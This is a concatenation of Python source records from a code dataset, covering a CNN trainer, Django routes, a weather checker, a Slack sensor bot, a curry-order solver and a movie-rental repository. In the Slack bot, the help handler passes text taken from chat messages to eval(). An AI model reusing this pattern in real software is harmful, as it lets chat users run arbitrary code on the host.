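    h10 = u**3 - 2 * u**2 + u
    h01 = -2 * u**3 + 3 * u**2
    h11 = u**3 - u**2
    return tuple(h00 * a + h10 * b + h01 * c + h11 * d
                 for a, b, c, d in zip(p0, t0, p1, t1))

# Endpoints with scaled tangents; longer tangents give a "fuller" blend.
pts = [hermite((0, 0), (3, 0), (4, 2), (0, 3), i / 10) for i in range(11)]
print(pts[0], pts[-1])  # starts at (0.0, 0.0), ends at (4.0, 2.0)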
fh)\n\t\t\tself.convpool_layers.append(layer)\n\t\t\toutw = outw / 2\n\t\t\touth = outh / 2\n\t\t\tmi = mo\n\t\t# intialize hidden layers\n\t\tself.hidden_layers = []\n\t\tM1 = self.convpool_layer_sizes[-1][0]*outw*outh\n\t\tcount = 0\n\t\tfor M2 in self.hidden_layer_sizes:\n\t\t\th = HiddenLayer(M1, M2, count)\n\t\t\tself.hidden_layers.append(h)\n\t\t\tM1 = M2 #output of last layer is input of next\n\t\t\tcount += 1\n\n\t\t# initaliz params of output layers\n\t\tW, b = init_weight_and_bias(M1, K)\n\t\tself.W = tf.Variable(W, 'W_logreg')\n\t\tself.b = tf.Variable(b, 'b_logreg')\n\n\t\tself.params = [self.W, self.b]\n\t\tfor h in self.convpool_layers:\n\t\t\tself.params += h.params\n\t\tfor h in self.hidden_layers:\n\t\t\tself.params += h.params\n\n\t\ttfX = tf.placeholder(tf.float32, shape = (None, d, d, c), name = 'X')\n\t\ttfY = tf.placeholder(tf.float32, shape = (None, K), name = 'Y')\n\t\tact = self.forward(tfX)\n\n\n\t\trcost = reg*sum([tf.nn.l2_loss(p) for p in self.params])\n\t\tcost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits = act, labels = tfY)) + rcost\n\t\tpredction = self.predict(tfX)\n\t\ttrain_op = tf.train.AdamOptimizer().minimize(cost)\n\n\t\tn_batches = int(N / batch_sz)\n\t\tcosts = []\n\t\tinit = tf.global_variables_initializer()\n\t\twith tf.Session() as session:\n\t\t\tsession.run(init)\n\t\t\tfor i in range(epochs):\n\t\t\t\tX, Y = shuffle(X, Y)\n\t\t\t\tfor j in range(n_batches):\n\t\t\t\t\tXbatch = X[j*batch_sz:(j*batch_sz + batch_sz)]\n\t\t\t\t\tYbatch = Y[j*batch_sz:(j*batch_sz + batch_sz)]\n\n\t\t\t\t\tsession.run(train_op, feed_dict={tfX: Xbatch, tfY: Ybatch})\n\n\t\t\t\t\tif j % 20 == 0:\n\t\t\t\t\t\tc = session.run(cost, feed_dict = {tfX: Xvalid, tfY: Yvalid})\n\t\t\t\t\t\tcosts.append(c)\n\n\t\t\t\t\t\tp = session.run(predction, feed_dict = {tfX: Xvalid, tfY: Yvalid})\n\t\t\t\t\t\te = error_rate(Yvalid_flat, p)\n\t\t\t\t\t\tprint(\"i:\", i, \"j:\", j, \"nb:\", n_batches, \"cost:\", c, \"error_rate\", e)\n\n\t\tif show_fig:\n\t\t\tplt.plot(costs)\n\t\t\tplt.show()\n\n\tdef forward(self, X):\n\t\tZ = X\n\t\tfor c in self.convpool_layers:\n\t\t\tZ = c.forward(Z)\n\t\tZ_shape = Z.get_shape().as_list()\n\t\tZ = tf.reshape(Z,[-1, np.prod(Z_shape[1:])])\n\t\tfor h in self.hidden_layers:\n\t\t\tZ = h.forward(Z)\n\t\treturn tf.matmul(Z, self.W) + self.b\n\n\tdef predict(self, X):\n\t\tact = self.forward(X)\n\t\treturn tf.argmax(act,1)\n\n\n\ndef main():\n\tX, Y = getImageData()\n\n\tmodel = CNN(\n\t\tconvpool_layer_sizes=[(20,5,5), (20,5,5)],\n\t\thidden_layer_sizes = [500, 300],\n\t\t)\n\tmodel.fit(X,Y, show_fig=True)\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"NickMcKillip/deep_learning_practice","sub_path":"tensorcnnproj.py","file_name":"tensorcnnproj.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33088179807","text":"from django.conf.urls import url\n\nfrom . 
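In CNN.fit above, each 2x2 max-pool with stride 2 halves the spatial size, and the flattened width feeding the first hidden layer is channels * outw * outh (the original keeps floats and casts later). A sketch of that arithmetic:

def flattened_size(d, convpool_layer_sizes):
    outw = outh = d
    for mo, fw, fh in convpool_layer_sizes:
        outw //= 2  # integer division avoids the float sizes the original casts away
        outh //= 2
    return convpool_layer_sizes[-1][0] * outw * outh

print(flattened_size(48, [(20, 5, 5), (20, 5, 5)]))  # 20 * 12 * 12 = 2880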
import views\n\nurlpatterns = [\n url(r'^settings/$', views.blog_settings, name='blog_settings'),\n url(r'^$', views.IndexList.as_view(), name='index'),\n url(r'^login/$', views.Login.as_view(), name='login'),\n url(r'^logout/$', views.logout, name='logout'),\n url(r'^register/$', views.Register.as_view(), name='register'),\n url(r'^search/$', views.search, name='search'),\n]","repo_name":"jpyamamoto/PythonDjango-PlasmaCMS","sub_path":"settings/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"7041065896","text":"#!/usr/bin/env python3\nfrom Helpers.Config import Config\nfrom copy import deepcopy\nfrom pprint import pformat, pprint\nimport collections\nimport pandas as pd\nfrom Preprocess.dark_sky_management import *\n\nclass WeatherDataCheck(collections.MutableMapping):\n \"\"\"The class for managing the working weather data structures for processing\n\n This application requires a good bit of input because I prefer not\n deriving information from the current location of a computer.\n\n \"\"\"\n def __init__(self,cfg:Config):\n \"\"\"Initialize the weather data management, the data can be rather large so this\n uses a dictionary for the data management\n \n Arguments:\n cfg {Config} -- The initial config object for processing\n \"\"\"\n self.data = dict()\n self.data[\"cfg\"] = deepcopy(cfg) # notice the deep copy for this item\n self.data[\"weather_time_names\"] = ['lat','long','time','day','hm','tz']\n self.data[\"weather_data_names\"] = ['dewPoint','humidity','precipIntensity',\n 'pressure','temperature','uvIndex','visibility',\n 'windBearing','windGust','windSpeed']\n\n # Overloads so that it acts kinda like a dictionary\n def __getitem__(self,key:str) -> str:\n try:\n return self.data[self.__keytransform__(key)]\n except KeyError as e:\n print(\"Key error {} : {}\".format(e,self.__keytransform__(key)))\n def __setitem__(self,key:str,value):\n self.data[self.__keytransform__(key)] = value\n def __delitem__(self,key:str):\n del self.data[self.__keytransform__(key)]\n def __len__(self):\n return len(self.data)\n def __keytransform__(self, key:str) -> str:\n return key.lower()\n def __iter__(self):\n return iter(self.data)\n def __repr__(self):\n return pformat(self.state())\n # General functions\n def state(self):\n return {\"keys\":self.data.keys(), \"configuration\":self[\"cfg\"]}\n def get_all_weather_names(self):\n return self[\"weather_time_names\"] + self[\"weather_data_names\"]\n # Initialize the pandas\n def set_weather_panda(self):\n \"\"\"Sets up a pandas for processing weather\n\n If the weather file doesn't exist, it builds an empty panda with the correct column names\n \"\"\"\n work_weather = None\n try:\n work_weather = pd.read_csv(self[\"cfg\"][\"weather_file\"])\n except FileNotFoundError:\n if self[\"cfg\"][\"verbose\"]:\n print(\"Building a default panda DataFrame\")\n all_columns = self.get_all_weather_names()\n work_weather = pd.DataFrame(columns=all_columns)\n work_weather.sort_values([\"time\"])\n self[\"weather_panda\"] = work_weather\n print(\"Set Weather Panda {}\".format(self[\"weather_panda\"].shape[0]))\n #\n def check_weather_dates(self):\n \"\"\"Purpose: check that each date has 24 hours of data\n \n \"\"\"\n try:\n df_shape = self[\"weather_panda\"].shape\n num_rows = df_shape[0]\n if num_rows == 0:\n if self[\"cfg\"][\"verbose\"]:\n print(\"Must have data to process.\")\n raise KeyError\n else:\n day_counts = 
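The url() helper above is the pre-2.0 Django style; assuming Django 2.0 or later, the same routes read more simply with path() (a sketch, not a drop-in tested change):

from django.urls import path
from . import views

urlpatterns = [
    path("settings/", views.blog_settings, name="blog_settings"),
    path("", views.IndexList.as_view(), name="index"),
    path("login/", views.Login.as_view(), name="login"),
    path("logout/", views.logout, name="logout"),
    path("register/", views.Register.as_view(), name="register"),
    path("search/", views.search, name="search"),
]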
self[\"weather_panda\"].groupby([\"day\"]).size().reset_index(name=\"counts\")\n short_day_counts = day_counts[day_counts['counts'] < 24]\n short_days = short_day_counts.shape\n print(\"The number of short days is: {}\".format(short_days[0]))\n total_data_pts = short_day_counts['counts'].sum()\n print(\"The number of missing data points is: {}\".format(short_days[0]*24 - total_data_pts))\n #Summerize the missing data points\n total_points = self[\"weather_panda\"].shape\n print(\"The number of points found is: {}\".format(total_points[0]))\n \n except KeyError as e:\n raise KeyError(\"The pandas needs to be read in to update the weather file {}\".format(e))\n #\n","repo_name":"draceoptimizer/WeatherAndElectricity","sub_path":"Weather/WeatherDataCheck.py","file_name":"WeatherDataCheck.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43498942493","text":"import re\nfrom slackbot.bot import listen_to\nfrom . import settings\nimport wirelesstagpy\nimport os\nimport sys\nfrom slackmq import slackmq\nimport chatops\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\ndevice_name = os.environ['DEVICE_NAME']\nchat = chatops.Chatops(settings.servers.homeops.bot_webhook)\n\nif (settings.plugins.wirelesstags.enabled):\n @listen_to(\"^show sensors\", re.IGNORECASE)\n def showsensors(message):\n \"\"\"show sensors\n Display WirelessTags sensor readings for all tags.\n \"\"\"\n if (os.environ['TARGET_DEVICE'] != 'all' and\n os.environ['TARGET_DEVICE'] != device_name):\n return\n post = slackmq(os.environ['API_TOKEN'],\n message.body['channel'], message.body['ts'])\n if not post.ack():\n return\n username = settings.servers.wirelesstags.username\n password = settings.servers.wirelesstags.password\n api = wirelesstagpy.WirelessTags(username=username,\n password=password)\n sensors = api.load_tags()\n for (uuid, tag) in sensors.items():\n message.send(\n 'Loaded sensor: {0}, \\\n temp: {1}, \\\n humidity: {2} \\\n probe taken: {3}'.format(\n tag.name, tag.temperature,\n tag.humidity, tag.time_since_last_update))\n post.unack()\n\n @listen_to('^help (show) (.*)$', re.IGNORECASE)\n def help(message, command, args):\n if (os.environ['TARGET_DEVICE'] != 'all' and\n os.environ['TARGET_DEVICE'] != device_name):\n return\n post = slackmq(os.environ['API_TOKEN'],\n message.body['channel'], message.body['ts'])\n try:\n command = command + args.replace(' ', '_')\n desc = eval(command).__doc__\n except Exception:\n return\n if not post.ack():\n return\n chat.help(desc)\n post.unack()\n","repo_name":"meltaxa/troupe","sub_path":"homeops/wirelesstags.py","file_name":"wirelesstags.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"61"} +{"seq_id":"31265306625","text":"import logging\nfrom typing import Optional\n\nfrom constants import VEGETARIAN\nfrom customer.customers import get_next_customer, get_next_customer_and_curry_number\nfrom customer.happy_customers import get_happy_customers_id\nfrom order.order_processor import update_order\nfrom order.orders import Order\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\ndef prepare_curry(order: Order) -> Optional[list]:\n curries_list: list = [VEGETARIAN for _ in range(order.total_recipe)]\n num_of_happy_customer = 0\n log_updated_information(num_of_happy_customer, order)\n\n while num_of_happy_customer < order.total_customer and 
len(order.customers_info) > 0:\n next_customer = get_next_customer(order.customers_info)\n if next_customer.num_of_preference <= 0:\n break\n\n next_curry_info, next_customer_info = get_next_customer_and_curry_number(next_customer, order)\n curry_name = next_customer_info[next_curry_info.curry_number]\n curries_list[next_curry_info.curry_number - 1] = curry_name\n num_of_happy_customer, order = update_all_relevant_info(curry_name, next_curry_info,\n num_of_happy_customer, order)\n return curries_list if order.total_customer == num_of_happy_customer else None\n\n\ndef update_all_relevant_info(curry_name, next_curry_info, num_of_happy_customer, order):\n happy_customer_ids = get_happy_customers_id(curry_name, next_curry_info, order)\n num_of_happy_customer += len(happy_customer_ids)\n order = update_order(order, happy_customer_ids, next_curry_info.curry_number)\n log_updated_information(num_of_happy_customer, order)\n return num_of_happy_customer, order\n\n\ndef log_updated_information(happy_customer: int, order: Order):\n logging.debug(\"customers info - {} - num of customer- {}\".format(order.customers_info, len(order.customers_info)))\n logging.debug(\"meat pref- {} \".format(order.meat_preference))\n logging.debug(\"veg pref- {} \".format(order.veg_preference))\n logging.debug(\"happy customer- {} \".format(happy_customer))\n","repo_name":"imsazzad/curry_wholesaler","sub_path":"app/curry/curry_maker.py","file_name":"curry_maker.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73630887235","text":"import operator\r\nfrom Entities import Movie, Client, Rental\r\nfrom errors import RepoError\r\nimport pickle\r\nfrom pickle import dump\r\n\r\nclass repoMovies(object):\r\n\r\n @staticmethod\r\n def check_string(list_item, search_term):\r\n search_term = search_term.casefold()\r\n list_item = list_item.casefold()\r\n if str(search_term) not in str(list_item):\r\n return False\r\n else:\r\n return True\r\n\r\n def __init__(self):\r\n self._movie_list = []\r\n\r\n def size(self):\r\n return len(self._movie_list)\r\n\r\n def add(self, obj):\r\n if obj in self._movie_list:\r\n raise RepoError(\"Id already exists !\\n\")\r\n self._movie_list.append(obj)\r\n\r\n def remove(self, obj):\r\n if obj not in self._movie_list:\r\n raise RepoError(\"Movie not available for removing !\")\r\n else :\r\n self._movie_list.remove(obj)\r\n\r\n def getMovie(self,id):\r\n valid = 1\r\n for movie in self._movie_list:\r\n if movie.get_movie_id() == id:\r\n return movie\r\n if valid == 1:\r\n raise RepoError(\"Movie does not exist !\")\r\n\r\n def check_movie(self, movie):\r\n if movie not in self._movie_list:\r\n raise RepoError(\"Not a valid movie id \")\r\n\r\n def update_movie(self, movie, new_movie):\r\n if movie not in self._movie_list:\r\n raise RepoError(\"Movie not in list !\")\r\n index = self._movie_list.index(movie)\r\n self._movie_list[index] = new_movie\r\n\r\n def get_all(self):\r\n return self._movie_list[:]\r\n #--------------SEARCHING--------------------\r\n\r\n def search_id(self, string):\r\n __search_list = []\r\n for movie in self._movie_list:\r\n m_id = movie.get_movie_id()\r\n if repoMovies.check_string(m_id, string):\r\n __search_list.append(movie)\r\n if len(__search_list) == 0:\r\n raise RepoError(\"Movie not found !\")\r\n else:\r\n return __search_list\r\n\r\n def search_title(self, string):\r\n __search_list = []\r\n for movie in self._movie_list:\r\n title= movie.get_title()\r\n if 
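check_string in the repo.py snippet above does a case-insensitive substring test by casefolding both sides; the str() wrapping is redundant once both arguments are already strings. A minimal standalone equivalent (the function name here is mine, not the project's):

def contains_ci(haystack: str, needle: str) -> bool:
    # casefold() is the recommended way to do caseless matching in Python
    return needle.casefold() in haystack.casefold()

assert contains_ci("The Godfather", "GOD")
assert not contains_ci("Alien", "predator")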
repoMovies.check_string(title, string):\r\n __search_list.append(movie)\r\n if len(__search_list) == 0:\r\n raise RepoError(\"Movie not found !\")\r\n else:\r\n return __search_list\r\n\r\n def search_desc(self, string):\r\n __search_list = []\r\n for movie in self._movie_list:\r\n desc = movie.get_desc()\r\n if repoMovies.check_string(desc, string):\r\n __search_list.append(movie)\r\n if len(__search_list) == 0:\r\n raise RepoError(\"Movie not found !\")\r\n else:\r\n return __search_list\r\n\r\n def search_genre(self, string):\r\n __search_list = []\r\n for movie in self._movie_list:\r\n genre = movie.get_genre()\r\n if repoMovies.check_string(genre, string):\r\n __search_list.append(movie)\r\n if len(__search_list) == 0:\r\n raise RepoError(\"Movie not found !\")\r\n else:\r\n return __search_list\r\n\r\n def delete_list(self):\r\n self._movie_list.clear()\r\n\r\n #---------------STATS---------------\r\n\r\n def movie_stats(self):\r\n if len(self._movie_list) != 0:\r\n top_list = sorted(self._movie_list, key=lambda obj:obj.get_movie_stats(), reverse = True)\r\n return top_list\r\n else:\r\n raise RepoError(\"Can not do a top because movie list is empty !\")\r\n\r\n #----------------GENERATE-------------\r\n def generate_movies(self):\r\n file = open(\"Random/Movies.txt\", \"r\")\r\n movies = file.readlines()\r\n file.close()\r\n for movie in movies:\r\n movie = movie.split(\",\")\r\n m_id = movie[0]\r\n m_title = movie[1]\r\n m_desc = movie[2]\r\n m_genre = movie[3]\r\n self._movie_list.append(Movie(m_id, m_title, m_desc, m_genre, True, 0))\r\n\r\nclass repoClients(object):\r\n\r\n def __init__(self):\r\n self._client_list = []\r\n\r\n def size(self):\r\n return len(self._client_list)\r\n\r\n def add(self, obj):\r\n if obj in self._client_list:\r\n raise RepoError(\"Id already exists !\\n\")\r\n self._client_list.append(obj)\r\n\r\n def remove(self, obj):\r\n if obj not in self._client_list:\r\n raise RepoError(\"Client not available for removing !\")\r\n else :\r\n self._client_list.remove(obj)\r\n\r\n def getClient(self,id):\r\n valid = 1\r\n for client in self._client_list:\r\n if client.get_client_id() == id:\r\n valid = 0\r\n return client\r\n if valid == 0:\r\n raise RepoError(\"Client does not exist !\")\r\n\r\n def check_client(self, client):\r\n if client not in self._client_list:\r\n raise RepoError(\"Not a valid client id ! 
\")\r\n\r\n def update_client(self,client, new_client):\r\n if client not in self._client_list:\r\n raise RepoError(\"Client not in list !\")\r\n index = self._client_list.index(client)\r\n self._client_list[index] = new_client\r\n\r\n def get_all(self):\r\n return self._client_list[:]\r\n #---------------SEARCH---------------\r\n\r\n def search_id(self, string):\r\n __search_list = []\r\n for client in self._client_list:\r\n c_id = client.get_client_id()\r\n if repoMovies.check_string(c_id, string):\r\n __search_list.append(client)\r\n if len(__search_list) == 0:\r\n raise RepoError(\"Client not found !\")\r\n else:\r\n return __search_list\r\n\r\n def search_name(self, string):\r\n __search_list = []\r\n for client in self._client_list:\r\n name = client.get_name()\r\n if repoMovies.check_string(name, string):\r\n __search_list.append(client)\r\n if len(__search_list) == 0:\r\n raise RepoError(\"Client not found !\")\r\n else:\r\n return __search_list\r\n\r\n def delete_list(self):\r\n self._client_list.clear()\r\n\r\n #-----------------STATS-----------------\r\n\r\n def client_stats(self):\r\n if len(self._client_list) != 0:\r\n top_list = sorted(self._client_list, key = lambda obj:obj.get_stats(), reverse = True)\r\n return top_list\r\n else:\r\n raise RepoError(\"Can not do a top because client list is empty !\")\r\n\r\n #----------------GENERATE-------------\r\n def generate_clients(self):\r\n file = open(\"Random/Clients.txt\", \"r\")\r\n clients = file.readlines()\r\n file.close()\r\n for client in clients:\r\n client = client.split(\",\")\r\n c_id = client[0]\r\n c_name = client[1]\r\n self._client_list.append(Client(c_id, c_name, 0))\r\n\r\nclass repoRentals(object):\r\n\r\n def __init__(self):\r\n self._rental_list = []\r\n self._late_rental = []\r\n\r\n def get_rentals(self):\r\n return self._rental_list\r\n\r\n def get_all(self):\r\n return self._rental_list[:]\r\n\r\n def verify_valid(self, client_id, date):\r\n for rent in self._rental_list:\r\n if rent.get_client_id() == client_id:\r\n if str(rent.get_due()) < str(date):\r\n raise RepoError(\"Client has passed their due date for a rented movie !\")\r\n\r\n def remove_rental(self, rent):\r\n self._rental_list.remove(rent)\r\n\r\n def add_rental(self, rental):\r\n if rental in self._rental_list:\r\n raise RepoError(\"Rental already in list\")\r\n self._rental_list.append(rental)\r\n\r\n def rental_stats(self):\r\n if len(self._late_rental) != 0:\r\n top_list = sorted(self._late_rental, key = lambda obj:obj.get_late_days(), reverse = True)\r\n return top_list\r\n else:\r\n raise RepoError(\"Can not do a top because rental list is empty !\")\r\n\r\n def late_movies(self, rental):\r\n self._late_rental.append(rental)\r\n\r\n #------------GENERATE---------------\r\n\r\n def generate_rentals(self):\r\n pass\r\n \"\"\" \r\n file = open(\"Random/Rentals.txt\", \"r\")\r\n rentals = file.readlines()\r\n file.close()\r\n for rental in rentals:\r\n rental = rental.split(\",\")\r\n r_id = rental[0]\r\n m_id = rental[1]\r\n c_id = rental[2]\r\n r_date = rental[3]\r\n r_due = rental[4]\r\n self._rental_list.append(Rental(r_id, m_id, c_id, r_date, r_due, None, 0))\r\n \"\"\"\r\n\r\nclass Undo_redo(object):\r\n #add , remove, update, rent, return\r\n def __init__(self):\r\n self.__undo_list = []\r\n self.__redo_list = []\r\n\r\n def get_action(self):\r\n if len(self.__redo_list) == 0:\r\n raise RepoError(\"can not undo anymore !\")\r\n else:\r\n return self.__redo_list[-1]\r\n\r\n def add_action(self, action):\r\n 
self.__redo_list.append(action)\r\n\r\n def copy_undo_action(self):\r\n self.__undo_list.append(self.__redo_list[-1])\r\n self.__redo_list.pop()\r\n\r\n def get_undo(self):\r\n return self.__undo_list[:]\r\n\r\n def get_undo_action(self):\r\n if len(self.__undo_list) == 0:\r\n raise RepoError(\"No undo operations were performed ! \")\r\n else:\r\n return self.__undo_list[-1]\r\n\r\nclass pickle_repoMovies(object):\r\n\r\n def __init__(self, file):\r\n self.__file = file\r\n\r\n def __load_movies(self):\r\n file = open (self.__file, \"rb\")\r\n try:\r\n movie_list = pickle.load(file)\r\n except Exception:\r\n movie_list = []\r\n file.close()\r\n return movie_list[:]\r\n\r\n def __store(self, movie_list):\r\n file = open(self.__file, \"wb\")\r\n pickle.dump(movie_list, file)\r\n file.close()\r\n\r\n def size(self, movie_list):\r\n return len(movie_list)\r\n\r\n def add(self, obj):\r\n movies = self.__load_movies()\r\n if obj in movies:\r\n raise RepoError(\"Movie already in list !\")\r\n movies.append(obj)\r\n self.__store(movies)\r\n\r\n def remove(self, obj):\r\n movies = self.__load_movies()\r\n if obj not in movies:\r\n raise RepoError(\"Movie not in list !\")\r\n for i in range(len(movies)):\r\n if movies[i] == obj:\r\n del movies[i]\r\n break\r\n self.__store(movies)\r\n\r\n def getMovie(self,id):\r\n movies = self.__load_movies()\r\n for movie in movies:\r\n if movie.getID() == id:\r\n return movie\r\n raise RepoError(\"Movie not in list! \")\r\n\r\n def update_movie(self, movie, new_movie):\r\n movies = self.__load_movies()\r\n if movie not in movies:\r\n raise RepoError(\"Movie does not exist ! \")\r\n for i in range(len(movies)):\r\n if movies[i] == movie:\r\n movies[i] = new_movie\r\n break\r\n self.__store(movies)\r\n\r\n def get_all(self):\r\n movies = self.__load_movies()\r\n return movies[:]\r\n\r\n def generate_movies(self):\r\n pass\r\n\r\nclass file_repoMovies:\r\n\r\n def __init__(self,file):\r\n self.__file = file\r\n\r\n def __load_movies(self):\r\n file = open (self.__file, \"r\")\r\n movies = file.readlines()\r\n movie_list = []\r\n for movie in movies :\r\n movie.strip()\r\n movie = movie.replace(\"\\n\", \"\")\r\n movie = movie.split(\",\")\r\n movie_list.append(Movie(str(movie[0]),str(movie[1]),str(movie[2]),str(movie[3]),bool(movie[4]),int(movie[5])))\r\n file.close()\r\n return movie_list\r\n\r\n def __store(self, movie_list):\r\n file = open(self.__file, \"w\")\r\n for movie in movie_list:\r\n file.write(str(movie.get_movie_id() + \",\" + movie.get_title() + \",\" + movie.get_desc() + \",\" + movie.get_genre() + \",\" + movie.get_availability() + \",\" + movie.get_movie_stats()+\"\\n\"))\r\n file.close()\r\n\r\n def size(self, movie_list):\r\n return len(movie_list)\r\n\r\n def add(self, obj):\r\n movies = self.__load_movies()\r\n if obj in movies:\r\n raise RepoError(\"Movie already in list ! \")\r\n movies.append(obj)\r\n self.__store(movies)\r\n\r\n\r\n def remove(self, obj):\r\n movies = self.__load_movies()\r\n if obj not in movies:\r\n raise RepoError(\"Movie not in list !\")\r\n for i in range(len(movies)):\r\n if movies[i] == obj:\r\n del movies[i]\r\n break\r\n self.__store(movies)\r\n\r\n def getMovie(self,id):\r\n movies = self.__load_movies()\r\n for movie in movies:\r\n if movie.get_movie_id() == id:\r\n return movie\r\n raise RepoError(\"Movie not in list! \")\r\n\r\n def update_movie(self, movie, new_movie):\r\n movies = self.__load_movies()\r\n if movie not in movies:\r\n raise RepoError(\"Movie does not exist ! 
\")\r\n for i in range(len(movies)):\r\n if movies[i] == movie:\r\n movies[i] = new_movie\r\n break\r\n self.__store(movies)\r\n\r\n def get_all(self):\r\n movies = self.__load_movies()\r\n movie_list = []\r\n for movie in range(0,len(movies)):\r\n movie_list.append(movies[movie])\r\n return movie_list[:]\r\n\r\n def generate_movies(self):\r\n pass\r\n\r\nclass pickle_repoClients(object):\r\n\r\n def __init__(self, file):\r\n self.__file = file\r\n\r\n def __load_clients(self):\r\n file = open (self.__file, \"rb\")\r\n try:\r\n client_list = pickle.load(file)\r\n except Exception:\r\n client_list = []\r\n file.close()\r\n return client_list[:]\r\n\r\n def __store(self, client_list):\r\n file = open(self.__file, \"wb\")\r\n pickle.dump(client_list, file)\r\n file.close()\r\n\r\n def size(self, client_list):\r\n return len(client_list)\r\n\r\n def add(self, obj):\r\n clients = self.__load_clients()\r\n if obj in clients:\r\n raise RepoError(\"Client already in list !\")\r\n clients.append(obj)\r\n self.__store(clients)\r\n\r\n def remove(self, obj):\r\n clients = self.__load_clients()\r\n if obj not in clients:\r\n raise RepoError(\"Client not in list !\")\r\n for i in range(len(clients)):\r\n if clients[i] == obj:\r\n del clients[i]\r\n break\r\n self.__store(clients)\r\n\r\n def getClient(self,id):\r\n clients = self.__load_clients()\r\n for client in clients:\r\n if client.get_client_id() == id:\r\n return client\r\n raise RepoError(\"Client not in list! \")\r\n\r\n def update_client(self, client, new_client):\r\n clients = self.__load_clients()\r\n if client not in clients:\r\n raise RepoError(\"Client does not exist ! \")\r\n for i in range(len(clients)):\r\n if clients[i] == client:\r\n client[i] = new_client\r\n break\r\n self.__store(clients)\r\n\r\n def get_all(self):\r\n movies = self.__load_clients()\r\n return movies[:]\r\n\r\n def generate_clients(self):\r\n pass\r\n\r\nclass file_repoClients:\r\n\r\n def __init__(self,file):\r\n self.__file = file\r\n\r\n def __load_clients(self):\r\n file = open (self.__file, \"r\")\r\n clients = file.readlines()\r\n client_list = []\r\n for client in clients :\r\n client.strip()\r\n client = client.replace(\"\\n\", \"\")\r\n client = client.split(\",\")\r\n client_list.append(Client(str(client[0]),str(client[1]),int(client[2])))\r\n file.close()\r\n return client_list\r\n\r\n def __store(self, client_list):\r\n file = open(self.__file, \"w\")\r\n for client in client_list:\r\n file.write(str(client.get_client_id()) + \",\" + str(client.get_name()) + \",\" + str(client.get_stats())+\"\\n\")\r\n file.close()\r\n\r\n def size(self, client_list):\r\n return len(client_list)\r\n\r\n def add(self, obj):\r\n clients = self.__load_clients()\r\n if obj in clients:\r\n raise RepoError(\"Client already in list ! \")\r\n clients.append(obj)\r\n self.__store(clients)\r\n\r\n\r\n def remove(self, obj):\r\n clients = self.__load_clients()\r\n if obj not in clients:\r\n raise RepoError(\"Client not in list !\")\r\n for i in range(len(clients)):\r\n if clients[i] == obj:\r\n del clients[i]\r\n break\r\n self.__store(clients)\r\n\r\n def getClient(self,id):\r\n clients = self.__load_clients()\r\n for client in clients:\r\n if client.get_client_id() == id:\r\n return client\r\n raise RepoError(\"Client not in list! \")\r\n\r\n def update_client(self, client, new_client):\r\n clients = self.__load_clients()\r\n if client not in clients:\r\n raise RepoError(\"Client does not exist ! 
\")\r\n for i in range(len(clients)):\r\n if clients[i] == client:\r\n clients[i] = new_client\r\n break\r\n self.__store(clients)\r\n\r\n def get_all(self):\r\n clients = self.__load_clients()\r\n client_list = []\r\n for client in range(0,len(clients)):\r\n client_list.append(clients[client])\r\n return client_list[:]\r\n\r\n def generate_clients(self):\r\n pass","repo_name":"Daniele1209/Movie-management-app-Python","sub_path":"repo.py","file_name":"repo.py","file_ext":"py","file_size_in_byte":17408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18557507284","text":"from django.urls import path\nfrom . import views\n\napp_name = 'meals'\n\nurlpatterns = [\n path('', views.dish_list, name='dish_list'),\n path('dish//', views.dish_detail, name='dish_detail'),\n path('add_to_cart//', views.add_to_cart, name='add_to_cart'),\n path('checkout/', views.checkout_view, name='checkout'),\n path('order_confirmation/', views.order_confirmation, name='order_confirmation'),\n path('order//', views.order_details, name='order_details'),\n path('cart/', views.cart_view, name='cart_view'),\n path('create_dish/', views.create_dish, name='create_dish'),\n path('update_dish//', views.update_dish, name='update_dish'),\n path('create_ingredient/', views.create_ingredient, name='create_ingredient'),\n path('create_meal/', views.create_meal, name='create_meal'),\n path('meal_detail//', views.meal_detail, name='meal_detail'),\n path('meal_list/', views.meal_list, name='meal_list'),\n path('approve_meal_plan/', views.meal_plan_approval, name='approve_meal_plan'),\n path('payment//', views.process_payment, name='process_payment'),\n path('meal_plan_confirmation/', views.meal_plan_confirmed, name='meal_plan_confirmed'),\n path('meals_with_dish//', views.meals_with_dish, name='meals_with_dish'),\n path('chef//weekly_meal/', views.chef_weekly_meal, name='chef_weekly_meal'),\n path('api/search_ingredients/', views.api_search_ingredients, name='api_search_ingredients'),\n path('api/create_ingredient/', views.api_create_ingredient, name='api_create_ingredient'),\n path('api/customize_meal/', views.api_customize_meal_plan, name='api_customize_meal'),\n path('api/submit_meal_plan/', views.submit_meal_plan_updates, name='submit_meal_plan_updates'),\n path('api/get_meal_details/', views.get_meal_details, name='get_meal_details'),\n path('api/get_alternative_meals/', views.get_alternative_meals, name='get_alternative_meals'),\n path('view_past_orders/', views.view_past_orders, name='view_past_orders'),\n]\n","repo_name":"performlikemj/neighborhood-united","sub_path":"meals/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35693027795","text":"import shutil;\r\nimport sys;\r\nimport re;\r\nimport os;\r\n\r\n#def clean_up(show_folder):\r\n\r\n#Delves into the subdirectories and orders them into the\r\n#appropriate folders in the show directory\r\ndef organize_directories(download_folder, show_folder, file_types):\r\n for subdir, dirs, files in os.walk(download_folder):\r\n for file in files:\r\n item_list = check_show_and_season(file, file_types);\r\n\r\n if (item_list == None or item_list[1] == None):\r\n continue;\r\n\r\n src = os.path.join(subdir, file);\r\n #src = os.path.abspath(src);\r\n\r\n 